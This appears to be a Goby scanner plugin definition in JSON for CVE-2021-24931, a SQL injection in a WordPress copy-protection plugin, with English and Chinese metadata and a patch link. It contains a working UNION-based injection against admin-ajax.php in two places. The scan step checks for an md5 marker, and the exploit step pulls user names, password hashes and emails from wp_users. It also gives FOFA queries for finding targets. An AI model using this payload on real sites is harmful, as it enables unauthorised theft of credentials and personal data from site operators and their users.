Goby/json/WordPress-Plugin-SecureCopy...

144 lines
7.5 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "WordPress Plugin SecureCopyContentProtection SQLi CVE-2021-24931",
"Description": "<p>Secure copy content protection is a WordPress plug-in designed to protect web content from plagiarism. Once the copy protection plug-in is activated, it will disable right-click, copy and paste, content selection and copy shortcuts on your website, so as to prevent content theft and network capture, which is very popular today. In addition to all the above replication methods, replication protection also allows you to disable the check element and provide a protected site where copyright infringement will not occur.<br></p>",
"Product": "wordpress",
"Homepage": "https://wordpress.org/plugins/secure-copy-content-protection/",
"DisclosureDate": "2022-04-02",
"Author": "大C",
"FofaQuery": "body=\"/wp-content/plugins/secure-copy-content-protection\" || app=\"WordPress\"",
"GobyQuery": "body=\"/wp-content/plugins/secure-copy-content-protection\" || app=\"WordPress\"",
"Level": "3",
"Impact": "<p>1. The attacker can access the data in the database without authorization, steal the user's privacy and personal information, and cause the user's information disclosure.</p><p>2. You can add or delete data in the database, such as adding or deleting administrator accounts without permission.</p><p>3. If the website directory has write permission, it can be written to the web Trojan horse. The attacker can then tamper with the web page and publish some illegal information.</p><p>4. After steps such as raising the right, the highest authority of the server was obtained by the attacker. Attackers can remotely control the server and install backdoors to modify or control the operating system.</p>",
"Recommendation": "<p>Upgrade, patch link<br></p><p><a href=\"https://downloads.wordpress.org/plugin/secure-copy-content-protection.3.0.4.zip\">https://downloads.wordpress.org/plugin/secure-copy-content-protection.3.0.4.zip</a><br></p>",
"References": [
"https://fofa.info/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "sql",
"type": "select",
"value": "user_name,user_pass,user_email",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20union%20select%201,md5(1423),2,2,2,2%20from%20wp_users%20union%20select%201,1,1,1,1,1%20FROM%20wp_ays_sccp_reports%20WHERE%20(1=1%20&type=json",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "856fc81623da2150ba2210ba1b51d241",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20union%20select%201,{{{sql}}},2,2,2,2%20from%20wp_users%20union%20select%201,1,1,1,1,1%20FROM%20wp_ays_sccp_reports%20WHERE%20(1=1%20&type=json",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"Tags": [
"SQL Injection"
],
"VulType": [
"SQL Injection"
],
"CVEIDs": [
"CVE-2021-24931"
],
"CNNVD": [
"CNNVD-202112-366"
],
"CNVD": [
"CNVD-2021-99872"
],
"CVSSScore": "9.8",
"Translation": {
"CN": {
"Name": "WordPress SecureCopyContentProtection内容保护插件sccp_id参数SQL注入漏洞",
"Product": "wordpress",
"Description": "<p>Secure Copy Content Protection是一个WordPress插件旨在保护Web内容不被抄袭。一旦激活了复制保护插件它就会禁用您网站上的右键单击复制粘贴内容选择和复制快捷键从而防止内容盗窃以及网络抓取这在当今非常流行。除了上述所有复制方法外复制保护还允许禁用检查元素并提供一个受保护的站点其中不会发生侵犯版权的行为。</p>",
"Recommendation": "<p>升级版,补丁链接</p><p><a href=\"https://downloads.wordpress.org/plugin/secure-copy-content-protection.3.0.4.zip\">https://downloads.wordpress.org/plugin/secure-copy-content-protection.3.0.4.zip</a></p>",
"Impact": "<p>1、攻击者未经授权可以访问数据库中的数据盗取用户的隐私以及个人信息造成用户的信息泄露。</p><p>2、可以对数据库的数据进行增加或删除操作例如私自添加或删除管理员账号。</p><p>3、如果网站目录存在写入权限可以写入网页木马。攻击者进而可以对网页进行篡改发布一些违法信息等。</p><p>4、经过提权等步骤服务器最高权限被攻击者获取。攻击者可以远程控制服务器安装后门得以修改或控制操作系统。</p>",
"VulType": [
"SQL 注⼊"
],
"Tags": [
"SQL 注⼊"
]
},
"EN": {
"Name": "WordPress Plugin SecureCopyContentProtection SQLi CVE-2021-24931",
"Product": "wordpress",
"Description": "<p>Secure copy content protection is a WordPress plug-in designed to protect web content from plagiarism. Once the copy protection plug-in is activated, it will disable right-click, copy and paste, content selection and copy shortcuts on your website, so as to prevent content theft and network capture, which is very popular today. In addition to all the above replication methods, replication protection also allows you to disable the check element and provide a protected site where copyright infringement will not occur.<br></p>",
"Recommendation": "<p>Upgrade, patch link<br></p><p><a href=\"https://downloads.wordpress.org/plugin/secure-copy-content-protection.3.0.4.zip\">https://downloads.wordpress.org/plugin/secure-copy-content-protection.3.0.4.zip</a><br></p>",
"Impact": "<p>1. The attacker can access the data in the database without authorization, steal the user's privacy and personal information, and cause the user's information disclosure.</p><p>2. You can add or delete data in the database, such as adding or deleting administrator accounts without permission.</p><p>3. If the website directory has write permission, it can be written to the web Trojan horse. The attacker can then tamper with the web page and publish some illegal information.</p><p>4. After steps such as raising the right, the highest authority of the server was obtained by the attacker. Attackers can remotely control the server and install backdoors to modify or control the operating system.</p>",
"VulType": [
"SQL Injection"
],
"Tags": [
"SQL Injection"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}